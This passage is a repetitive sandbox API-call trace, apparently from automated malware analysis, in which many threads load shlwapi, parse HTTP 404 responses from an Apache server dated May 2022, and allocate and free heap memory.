Size=0x10) returned 0x6aead8 [0239.369] GetProcessHeap () returned 0x690000 [0239.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0239.369] GetProcessHeap () returned 0x690000 [0239.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 260 os_tid = 0xa00 [0239.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.626] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0239.626] GetProcessHeap () returned 0x690000 [0239.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0239.626] GetProcessHeap () returned 0x690000 [0239.626] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0239.626] GetProcessHeap () returned 0x690000 [0239.626] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 261 os_tid = 0x1328 [0239.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.803] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0239.803] GetProcessHeap () returned 0x690000 [0239.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0239.803] GetProcessHeap () returned 0x690000 [0239.803] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0239.803] GetProcessHeap () returned 0x690000 [0239.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 262 os_tid = 0x1020 [0239.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.985] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0239.985] GetProcessHeap () returned 0x690000 [0239.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0239.986] GetProcessHeap () returned 0x690000 [0239.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0239.986] GetProcessHeap () returned 0x690000 [0239.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 263 os_tid = 0x131c [0240.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.174] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0240.174] GetProcessHeap () returned 0x690000 [0240.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0240.174] GetProcessHeap () returned 0x690000 [0240.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0240.174] GetProcessHeap () returned 0x690000 [0240.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 264 os_tid = 0x4d0 [0240.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.369] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0240.369] GetProcessHeap () returned 0x690000 [0240.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0240.369] GetProcessHeap () returned 0x690000 [0240.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0240.369] GetProcessHeap () returned 0x690000 [0240.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 265 os_tid = 0xd78 [0241.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.096] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0241.097] GetProcessHeap () returned 0x690000 [0241.097] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0241.097] GetProcessHeap () returned 0x690000 [0241.097] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0241.097] GetProcessHeap () returned 0x690000 [0241.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 266 os_tid = 0xf64 [0241.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.449] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0241.449] GetProcessHeap () returned 0x690000 [0241.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0241.449] GetProcessHeap () returned 0x690000 [0241.449] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0241.449] GetProcessHeap () returned 0x690000 [0241.449] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 267 os_tid = 0xeb4 [0241.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.873] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0241.874] GetProcessHeap () returned 0x690000 [0241.874] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0241.874] GetProcessHeap () returned 0x690000 [0241.874] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0241.874] GetProcessHeap () returned 0x690000 [0241.874] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 268 os_tid = 0xff0 [0242.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.077] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0242.077] GetProcessHeap () returned 0x690000 [0242.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0242.077] GetProcessHeap () returned 0x690000 [0242.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0242.077] GetProcessHeap () returned 0x690000 [0242.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 269 os_tid = 0x890 [0242.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.261] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0242.261] GetProcessHeap () returned 0x690000 [0242.261] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0242.261] GetProcessHeap () returned 0x690000 [0242.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0242.261] GetProcessHeap () returned 0x690000 [0242.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 270 os_tid = 0x6dc [0242.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.446] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0242.446] GetProcessHeap () returned 0x690000 [0242.446] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0242.446] GetProcessHeap () returned 0x690000 [0242.446] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0242.446] GetProcessHeap () returned 0x690000 [0242.446] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 271 os_tid = 0xc88 [0242.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.669] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0242.669] GetProcessHeap () returned 0x690000 [0242.669] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0242.669] GetProcessHeap () returned 0x690000 [0242.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0242.669] GetProcessHeap () returned 0x690000 [0242.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 272 os_tid = 0x1358 [0242.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.874] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0242.878] GetProcessHeap () returned 0x690000 [0242.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0242.878] GetProcessHeap () returned 0x690000 [0242.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0242.878] GetProcessHeap () returned 0x690000 [0242.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 273 os_tid = 0xaf0 [0243.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.080] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.080] GetProcessHeap () returned 0x690000 [0243.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0243.080] GetProcessHeap () returned 0x690000 [0243.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0243.080] GetProcessHeap () returned 0x690000 [0243.081] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 274 os_tid = 0x1064 [0243.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.256] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.256] GetProcessHeap () returned 0x690000 [0243.256] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0243.256] GetProcessHeap () returned 0x690000 [0243.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0243.256] GetProcessHeap () returned 0x690000 [0243.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 275 os_tid = 0xf8c [0243.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.450] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.450] GetProcessHeap () returned 0x690000 [0243.450] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0243.451] GetProcessHeap () returned 0x690000 [0243.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0243.451] GetProcessHeap () returned 0x690000 [0243.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 276 os_tid = 0x1384 [0243.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.693] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.693] GetProcessHeap () returned 0x690000 [0243.693] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0243.693] GetProcessHeap () returned 0x690000 [0243.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0243.694] GetProcessHeap () returned 0x690000 [0243.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 277 os_tid = 0x410 [0243.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.888] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.888] GetProcessHeap () returned 0x690000 [0243.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0243.888] GetProcessHeap () returned 0x690000 [0243.889] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0243.889] GetProcessHeap () returned 0x690000 [0243.889] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 278 os_tid = 0xde0 [0244.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.075] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0244.075] GetProcessHeap () returned 0x690000 [0244.075] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0244.075] GetProcessHeap () returned 0x690000 [0244.075] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0244.075] GetProcessHeap () returned 0x690000 [0244.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 279 os_tid = 0xe1c [0244.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.264] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0244.264] GetProcessHeap () returned 0x690000 [0244.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0244.264] GetProcessHeap () returned 0x690000 [0244.264] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0244.264] GetProcessHeap () returned 0x690000 [0244.265] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 280 os_tid = 0x700 [0244.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.442] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0244.442] GetProcessHeap () returned 0x690000 [0244.442] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0244.442] GetProcessHeap () returned 0x690000 [0244.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0244.442] GetProcessHeap () returned 0x690000 [0244.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 281 os_tid = 0xf1c [0244.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.723] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0244.723] GetProcessHeap () returned 0x690000 [0244.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0244.724] GetProcessHeap () returned 0x690000 [0244.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0244.724] GetProcessHeap () returned 0x690000 [0244.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 282 os_tid = 0x8d4 [0244.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.959] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0244.959] GetProcessHeap () returned 0x690000 [0244.959] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0244.959] GetProcessHeap () returned 0x690000 [0244.959] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0244.959] GetProcessHeap () returned 0x690000 [0244.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 283 os_tid = 0xf3c [0245.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.161] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0245.161] GetProcessHeap () returned 0x690000 [0245.161] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0245.161] GetProcessHeap () returned 0x690000 [0245.161] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0245.162] GetProcessHeap () returned 0x690000 [0245.162] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 284 os_tid = 0x9b0 [0245.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.346] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0245.347] GetProcessHeap () returned 0x690000 [0245.347] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0245.347] GetProcessHeap () returned 0x690000 [0245.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0245.347] GetProcessHeap () returned 0x690000 [0245.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 285 os_tid = 0x3c0 [0245.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.589] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0245.589] GetProcessHeap () returned 0x690000 [0245.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0245.589] GetProcessHeap () returned 0x690000 [0245.589] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0245.589] GetProcessHeap () returned 0x690000 [0245.589] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 286 os_tid = 0x444 [0245.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0245.773] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0245.773] GetProcessHeap () returned 0x690000 [0245.773] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0245.773] GetProcessHeap () returned 0x690000 [0245.773] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0245.773] GetProcessHeap () returned 0x690000 [0245.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 287 os_tid = 0x1404 [0246.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.000] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.000] GetProcessHeap () returned 0x690000 [0246.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0246.000] GetProcessHeap () returned 0x690000 [0246.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0246.000] GetProcessHeap () returned 0x690000 [0246.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 288 os_tid = 0x1408 [0246.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.204] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.204] GetProcessHeap () returned 0x690000 [0246.204] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0246.204] GetProcessHeap () returned 0x690000 [0246.204] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0246.204] GetProcessHeap () returned 0x690000 [0246.204] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 289 os_tid = 0x140c [0246.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.441] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.441] GetProcessHeap () returned 0x690000 [0246.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0246.441] GetProcessHeap () returned 0x690000 [0246.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0246.441] GetProcessHeap () returned 0x690000 [0246.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 290 os_tid = 0x1410 [0246.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.652] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.652] GetProcessHeap () returned 0x690000 